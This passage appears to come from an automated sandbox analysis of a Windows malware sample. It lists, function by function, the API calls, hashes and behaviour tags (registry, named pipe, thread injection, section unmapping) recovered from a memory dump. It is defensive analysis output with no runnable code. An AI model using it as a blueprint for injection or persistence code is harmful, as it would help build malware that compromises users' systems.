    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
